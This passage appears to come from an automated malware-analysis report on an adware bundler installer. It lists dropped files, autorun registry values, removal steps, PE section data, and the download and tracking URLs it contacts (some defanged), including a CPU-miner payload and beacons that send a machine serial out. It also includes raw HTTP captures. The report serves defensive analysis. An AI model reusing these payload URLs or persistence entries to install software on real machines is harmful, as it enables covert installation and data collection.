    %Documents and Settings%\%current user%\Local Settings\Temp\nss25.tmp\registry.dll (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nss25.tmp\amisid.exe (1856 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nss25.tmp\nsisos.dll (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nss25.tmp\post_reply.htm (14 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsc1C.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsc1C.tmp\registry.dll (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsc1C.tmp\checks.txt (544 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsm1B.tmp (8776 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsc1C.tmp\amisid.exe (1856 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp\post_reply.htm (14 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp\inetc.dll (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp\md5dll.dll (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp\registry.dll (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp\nsisos.dll (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp\checks.txt (544 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SU1CM1PJ\thankyou[1].php (14 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nss1E.tmp (8776 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp\amisid.exe (1856 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-6JM0V.tmp\nsx27.tmp (3781 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\GAMESDESKTOP\GamesDesktop.lnk (812 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\upgmsd_re_005010096.7z (7433 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\encrypt.exe (4185 bytes)
    %Program Files%\gmsd_re_005010096\predm.exe (2321 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\is-42CRH.tmp (7433 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\is-QF5NP.tmp (15278 bytes)
    %Program Files%\gmsd_re_005010096\gmsd_re_005010096.exe (29430 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\_isetup\_shfoldr.dll (23 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\gamesdesktop_widget.7z (15278 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\is-UJDHN.tmp (4185 bytes)
    %Program Files%\gmsd_re_005010096\unins000.msg (375 bytes)
    %Program Files%\gmsd_re_005010096\gamesdesktop_widget.exe (77005 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\gmsd_re_005010096.7z (8657 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\itdownload.dll (1281 bytes)
    %Program Files%\gmsd_re_005010096\is-QNSOT.tmp (22284 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\predm.7z (2105 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\ex.bat (1564 bytes)
    %Program Files%\gmsd_re_005010096\unins000.dat (29605 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010096\upgmsd_re_005010096.exe (23062 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\is-TA4AV.tmp (8657 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\CheckProc.cmd (288 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\is-KNG9H.tmp (2105 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\upgmsd_re_005010096.exe (24230 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\predm.exe (1447 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\gmsd_re_005010096.exe (31996 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\gamesdesktop_widget.exe (92311 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr20.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nssE.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nst4.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsh11.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49OZBWQM\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nso13.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsf7.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49OZBWQM\7121923af824073a25b2b7e6ba0a6e0e[1].exe (6984 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd41.tmp (4152 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa28.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsf46.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SU1CM1PJ\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nss26.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsy34.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsp45.tmp (38832 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LLHPASG1\CESwN2Es[1].exe (11704 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsg10.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M5WEVZKN\setup[1].exe (128293 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M5WEVZKN\VuuPC_VO2_8907[1].exe (14960 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsm22.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu3B.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nss40.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsp5.tmp (869 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LLHPASG1\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsb2D.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49OZBWQM\Bundle_CPUminer[1].exe (7288 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu14.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr21.tmp (7288 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsn3.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SU1CM1PJ\setup_gmsd_re[1].exe (365499 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M5WEVZKN\Validate[1].exe (4152 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsy42.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsqA.tmp (11704 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsq9.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsg4B.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M5WEVZKN\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LLHPASG1\AnyProtectSetup[1].exe (38832 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsb2E.tmp (13784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nssF.tmp (128293 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsm3D.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsz36.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SU1CM1PJ\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3C.tmp (14960 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk6.tmp (3656 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SU1CM1PJ\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (90 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsj35.tmp (5952 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49OZBWQM\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (30 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M5WEVZKN\vos[1].htm (869 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M5WEVZKN\smt[1].exe (13784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsx2F.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49OZBWQM\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (105 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SU1CM1PJ\cmmdWriter[1].exe (3656 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsmB.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk15.tmp (6984 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LLHPASG1\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (30 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsg16.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk44.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsi2.tmp\inetc.dll (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49OZBWQM\policyname[1].exe (5952 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsx27.tmp (365499 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsrD.tmp (7695 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "upgmsd_re_005010096.exe" = "%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010096\upgmsd_re_005010096.exe -runhelper"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "gmsd_re_005010096" = "%Program Files%\gmsd_re_005010096\gmsd_re_005010096.exe"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Static Analysis

VersionInfo

Company Name:
Product Name:
Product Version: 1.0.0.1
Legal Copyright: Copyright 2013
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.0.0.1
File Description:
Comments:
Language: English (United States)

Company Name: Product Name: Product Version: 1.0.0.1Legal Copyright: Copyright 2013Legal Trademarks: Original Filename: Internal Name: File Version: 1.0.0.1File Description: Comments: Language: English (United States)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text409623628240644.46394856b32eb77dfd6fb67f21d6543272da5
.rdata28672476451203.4982dc77f8a1e6985a4361c55642680ddb4f
.data3686415471210243.32787922d4ce117d7d5b3ac2cffe4b0b5e4f
.ndata1925121166540800d41d8cd98f00b204e9800998ecf8427e
.rsrc1185792017152174084.10655a504ed888327f013e9b6042c9ab3920f

Dropped from:

b94011d26f9ca72020b33e8540b8d716

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:


Total found: 12
cd94fdb6cad0a1bdfdd660de105c7c7e
9ffcde27b445393ee950de1371e7c43b
7975cef8969d02a0cabd784a3c74c8cb
6014e42e22c25611cc80146e840cbe2b
97e4952df76a56d68e69044e1a43d39f
9afaab770c0e2b9d5905c10288742f99
e9c53b8632b68f0292577f666a972eb4
6f4730a0be5e8067038de9457fdac074
e85909bb2d7c5931b7f2139fefceab0e
6cd2ca94541223158754aefc3f898dd4
8537c506876458e69f1ae9ab7fe92f6c
df84eb115ec1c2bc974734c43acd2d72

Network Activity

URLs

URL IP
hxxp://ibf-cmi-1938953175.us-east-1.elb.amazonaws.com/54.243.67.55
hxxp://livestatscounter.com/Generic/vos.php?ch=NOCHPC&rdsn=0&idn=0&sid=&isnw=7&civ=2&or=&pac=&guidv=2&vpname=&prdk=&tst=50.7.86.58
hxxp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe54.239.168.49
hxxp://livestatscounter.com/SysInfo/validator/timer.php50.7.86.58
hxxp://cds.c5z6s5a3.hwcdn.net/69/all/cp/row/setup.exe
hxxp://ipgeoapi.com/184.73.240.107
hxxp://cds.c5z6s5a3.hwcdn.net/data.gif?app=12345&ibic=951432958192de010e9b45488dbf5014&verifier=7322dfe1785c6f32282020c020be2048&ver=107&os=XP32&browser=ci&campaign=003266&browserver=107&country=UA&event=3&rnd=8819
hxxp://s3-website-us-east-1.amazonaws.com/installer.gif?action=started&ibic=951432958192de010e9b45488dbf5014&verifier=7322dfe1785c6f32282020c020be2048&os=XP32&chver=X&ffver=X&iever=6&app=12345&srcid=003266&default=ie&ver=107&crtnm=OralTeams&rnd=2919
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=100&n=install_browser_start_async&ibic=951432958192de010e9b45488dbf5014&rnd=1121
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=250&n=install_browser_downloading&ibic=951432958192de010e9b45488dbf5014&rnd=7294
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=270&n=install_browser_all_thread_created_success&ibic=951432958192de010e9b45488dbf5014&rnd=2572
hxxp://cds.c5z6s5a3.hwcdn.net/crossbrowse/ie/107/ie.zip.004
hxxp://cds.c5z6s5a3.hwcdn.net/crossbrowse/ie/107/ie.zip.001
hxxp://cds.c5z6s5a3.hwcdn.net/crossbrowse/ie/107/ie.zip.002
hxxp://cds.c5z6s5a3.hwcdn.net/crossbrowse/ie/107/ie.zip.003
hxxp://cds.c5z6s5a3.hwcdn.net/crossbrowse/ie/107/ie.zip.005
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=310&n=install_browser_all_thread_ended_success&ibic=951432958192de010e9b45488dbf5014&rnd=6565
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=360&n=install_browser_all_files_in_place&ibic=951432958192de010e9b45488dbf5014&rnd=1178
hxxp://d1mdi78qyff344.cloudfront.net/7121923af824073a25b2b7e6ba0a6e0e.exe54.239.168.174
hxxp://cds.r5q6q4j7.hwcdn.net/OperaRUnew/Bundle_OperaRUnew.exe
hxxp://ils-front-balancer3-264552681.us-east-1.elb.amazonaws.com/thankyou.php
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=410&n=install_browser_install_ch_success&ibic=951432958192de010e9b45488dbf5014&rnd=657
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=480&n=install_browser_end_success&ibic=951432958192de010e9b45488dbf5014&rnd=3332
hxxp://cds.c5z6s5a3.hwcdn.net/data.gif?app=12345&ibic=951432958192de010e9b45488dbf5014&verifier=7322dfe1785c6f32282020c020be2048&ver=107&os=XP32&browser=ci&campaign=003266&browserver=107&country=UA&event=4&rnd=8567
hxxp://cds.r5q6q4j7.hwcdn.net/CPUminer/v6/Bundle_CPUminer.exe
hxxp://dl.tuto4pc.com/download/dwn/prq4633/este/re/setup_gmsd_re.exe
hxxp://prof.eorezo.com/cgi-bin/get_protect.cgi?checking=true&version=gmsd_us_233&forceGEO=US37.187.137.144
hxxp://ads.regiedepub.com/cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=142493&tag=RE_CLICKMEIN_INSTALL_INI37.187.148.215
hxxp://prof.eorezo.com/cgi-bin/get_protect.cgi37.187.137.144
hxxp://ads.under-myscreen.be/cgi-bin/advert/getkws.cgi?did=90068&version=0&key=azJJ.s8MVPsHc188.165.236.39
hxxp://ads.regiedepub.com/cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=142493&tag=RE_CLICKMEIN_INSTALL_F1137.187.148.215
hxxp://ads.regiedepub.com/cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=142493&tag=RE_CLICKMEIN_INSTALL_FIN37.187.148.215
hxxp://ads.regiedepub.com/cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=142493&tag=RE_CLICKMEIN_COUNT137.187.148.215
hxxp://ads.regiedepub.com/cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=142493&tag=RE_CLICKMEIN_DCOUNT137.187.148.215
hxxp://d10huri5h4o4a3.cloudfront.net/smt.exe54.239.168.217
hxxp://d2fpsq9kg43yka.cloudfront.net/sdk/binsis/2.2/BiTool.dll54.239.168.49
hxxp://d3oxtn1x3b8d7i.cloudfront.net/binsis/get_pre_offering_checks?uid=8A52D41A77F94021AA693531F4B425AD&v=2.2.2&v1=U2VyaWFsTnVtYmVyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWZXJzaW9uICAgICAgICAgICANDQpWTXdhcmUtNTYgNGQgOTEgYTcgMjYgNjcgYjIgYWQtNWMgMDIgMzcgNDIgZmEgOGEgOGIgMzcgIElOVEVMICAtIDYwNDAwMDA&affid=vuupcntmb&sid=vuupculwo&s=054.192.202.33
hxxp://d3oxtn1x3b8d7i.cloudfront.net/binsis/xml?uid=8A52D41A77F94021AA693531F4B425AD&v=2.2.2&v1=U2VyaWFsTnVtYmVyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWZXJzaW9uICAgICAgICAgICANDQpWTXdhcmUtNTYgNGQgOTEgYTcgMjYgNjcgYjIgYWQtNWMgMDIgMzcgNDIgZmEgOGEgOGIgMzcgIElOVEVMICAtIDYwNDAwMDA&affid=vuupcntmb&sid=vuupculwo&s=054.192.202.33
hxxp://d3oxtn1x3b8d7i.cloudfront.net/installers/bi_downloader/1443211351854/setup.exe54.192.202.33
hxxp://d10huri5h4o4a3.cloudfront.net/policyname.exe54.239.168.217
hxxp://sstatic1.histats.com/0.gif?2948573&101&101208.43.241.179
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=480&n=install_browser_end_success&ibic=951432958192de010e9b45488dbf5014&rnd=333254.231.1.180
hxxp://zip.rgbdomsrv.com/crossbrowse/ie/107/ie.zip.00169.16.175.10
hxxp://mystats.rgbdomsrv.com/installer.gif?action=started&ibic=951432958192de010e9b45488dbf5014&verifier=7322dfe1785c6f32282020c020be2048&os=XP32&chver=X&ffver=X&iever=6&app=12345&srcid=003266&default=ie&ver=107&crtnm=OralTeams&rnd=291954.231.9.44
hxxp://zip.rgbdomsrv.com/crossbrowse/ie/107/ie.zip.00369.16.175.10
hxxp://dl.staticclientstorage.com/69/all/cp/row/setup.exe69.16.175.10
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=360&n=install_browser_all_files_in_place&ibic=951432958192de010e9b45488dbf5014&rnd=117854.231.1.180
hxxp://www.software-forus.com/CPUminer/v6/Bundle_CPUminer.exe205.185.216.42
hxxp://logs.rgbdomsrv.com/data.gif?app=12345&ibic=951432958192de010e9b45488dbf5014&verifier=7322dfe1785c6f32282020c020be2048&ver=107&os=XP32&browser=ci&campaign=003266&browserver=107&country=UA&event=3&rnd=881969.16.175.10
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=310&n=install_browser_all_thread_ended_success&ibic=951432958192de010e9b45488dbf5014&rnd=656554.231.1.180
hxxp://zip.rgbdomsrv.com/crossbrowse/ie/107/ie.zip.00569.16.175.10
hxxp://logs.rgbdomsrv.com/data.gif?app=12345&ibic=951432958192de010e9b45488dbf5014&verifier=7322dfe1785c6f32282020c020be2048&ver=107&os=XP32&browser=ci&campaign=003266&browserver=107&country=UA&event=4&rnd=856769.16.175.10
hxxp://sub.spirlymo.com/installers/bi_downloader/1443211351854/setup.exe54.239.168.25
hxxp://zip.rgbdomsrv.com/crossbrowse/ie/107/ie.zip.00269.16.175.10
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=100&n=install_browser_start_async&ibic=951432958192de010e9b45488dbf5014&rnd=112154.231.1.180
hxxp://zip.rgbdomsrv.com/crossbrowse/ie/107/ie.zip.00469.16.175.10
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=270&n=install_browser_all_thread_created_success&ibic=951432958192de010e9b45488dbf5014&rnd=257254.231.1.180
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=250&n=install_browser_downloading&ibic=951432958192de010e9b45488dbf5014&rnd=729454.231.1.180
hxxp://www.software-forus.com/OperaRUnew/Bundle_OperaRUnew.exe205.185.216.42
hxxp://www.downloadsoup.com/thankyou.php54.243.139.119
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=410&n=install_browser_install_ch_success&ibic=951432958192de010e9b45488dbf5014&rnd=65754.231.1.180
hxxp://prof.youandmeandmeandyouhihi.com/cgi-bin/get_protect.cgi37.187.146.34
hxxp://dl.taxideataxus.com/download/dwn/prq4633/este/re/setup_gmsd_re.exe188.165.230.78
hxxp://d27foqb3kkzkt9.cloudfront.net/sdk/binsis/2.2/BiTool.dll54.239.168.66
s3.amazonaws.com54.231.2.168
upd.adskyforever.com37.187.147.141

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /crossbrowse/ie/107/ie.zip.004 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

Host: zip.rgbdomsrv.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Fri, 25 Sep 2015 20:58:13 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1441008913"

Last-Modified: Mon, 31 Aug 2015 08:15:13 GMT

Cache-Control: max-age=47110

Content-Length: 8244985

Content-Type: text/plain; charset=UTF-8

X-HW: 1443214693.dop008.fr7.t,1443214693.cds005.fr7.c

......."`...P.PB.............z.....R^z......cxT...x... ;K.....8..9i....|9..7...D..p[.2..!!.S.._.^..Z..W..8.@.'..\&!.!k...~..4.......f.V.u...0...^......,T;.....%......ch...F..c.........G.2../l.wr 1.&.?!..r.k.U....}%....w....}.2...}......oD.KX.G....p...s...$.W...c.Q.*<.4...Lz...@r.g;....~..w#..........`..@..m...){..$.......=z...J23..Bp....~.2.j.......pJ..X..C... .U.O5..h............._W...)#....:_lk.b.Z'..]..s0...6Y%..W........<...cP\Y..G.u.,U..B.og...8.C.~.8~..tj...t ....TT.-UQ....M.....1N-.x....P.p.#...wI..W...G.[.jO..Q.2.V1=..,/.......~..........."..Hma..se...^?.k....=...5...p.....I..G.hm. .vD....._...[.l...,.......s....O.....WU.v-:'.j..%...|....7.g...'..o1..._m.,.!.n.V.........Y5...}s<t..G.R3;R;8.....yP=.-.N...l{..r9..4.n&...U4..n..p.W....{d/l......*....!O*.j.}...%Q.....k.j..1=^.@G....!jI..5.....^7.O. ...DwR.....J/.@..4d."... ..$...#..........Xc.R>Vv.......;.d..C..W....'.....8 .*4Xw.drM.^...UE.C...]>.....ycA.... ....l..:..z..y....=I......9.........z.y......uX.... .T..........d-dj.7.d.!Q.qCqj.4.S{.&.".......s;..P.\.l..7...-OP....I...._\.YX2.6.Mb..._...5O.4....e..tyo...z.z.2.8..5........W..7......|.$............^..]..x...|...S...$....F.|_.SS......=...'...`rX....y...e.O..b...............U9hPfr..5KJ6;&.....d.d.......... .j....Wu.:...hk...a..s...]......?..T.]..8.cRN...........6..C=[.k....`......s]$.B, ....7;A......... ^.h~{..\:ybG.$..f.Q..l........#..FB.. ..........;.,RS.4].B-...N.EyNE...q.P_..g..}AY~_gz......42...%......Nx..D.D.!.]...[..o.1..&....."W.........nKK..).....<.x.@............?.m......c

<<< skipped >>>

GET /utility.gif?report=fdata&f=4&c=003266&i=100&n=install_browser_start_async&ibic=951432958192de010e9b45488dbf5014&rnd=1121 HTTP/1.1

Accept: */*

Host: err.rgbdomsrv.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

x-amz-id-2: YLopITNBcjpN6ZNi8bUL6iTNRHGJ4dIu o9d5cWkUkgX4APfSBwwAM3iZbDUF2fy

x-amz-request-id: BAEF3C8F442293E7

Date: Fri, 25 Sep 2015 20:58:14 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;....

GET /utility.gif?report=fdata&f=4&c=003266&i=250&n=install_browser_downloading&ibic=951432958192de010e9b45488dbf5014&rnd=7294 HTTP/1.1

Accept: */*

Host: err.rgbdomsrv.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

x-amz-id-2: ET3xUecvZStOBGT3yC0wimpaKYLCNwjfv5qE4TLp96oWD/bz8SQ5jHt9DcKq8K1I

x-amz-request-id: 58036336FBC82E2B

Date: Fri, 25 Sep 2015 20:58:14 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;....

GET /utility.gif?report=fdata&f=4&c=003266&i=270&n=install_browser_all_thread_created_success&ibic=951432958192de010e9b45488dbf5014&rnd=2572 HTTP/1.1

Accept: */*

Host: err.rgbdomsrv.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

x-amz-id-2: zweZsynuCa4vHJ5gXggxq4M211jIyHQDTMCfxHSA5o9vGoU30SN YdFasTdILWLX

x-amz-request-id: C9044ADDEA476483

Date: Fri, 25 Sep 2015 20:58:14 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: zweZsynuCa4vHJ5gXggxq4M211jIyHQDTMCfxHSA5o9vGoU30SN YdFasTdILWLX..x-amz-request-id: C9044ADDEA476483..Date: Fri, 25 Sep 2015 20:58:14 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;....

GET /utility.gif?report=fdata&f=4&c=003266&i=310&n=install_browser_all_thread_ended_success&ibic=951432958192de010e9b45488dbf5014&rnd=6565 HTTP/1.1

Accept: */*

Host: err.rgbdomsrv.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

x-amz-id-2: 7cg95osLL5z4DfX2gGVw4E9A19i6of3RrseV4p1UfGOZPhyxLZIMoI7hetPOskIW

x-amz-request-id: ABBF092CEF73FE0F

Date: Fri, 25 Sep 2015 20:58:24 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

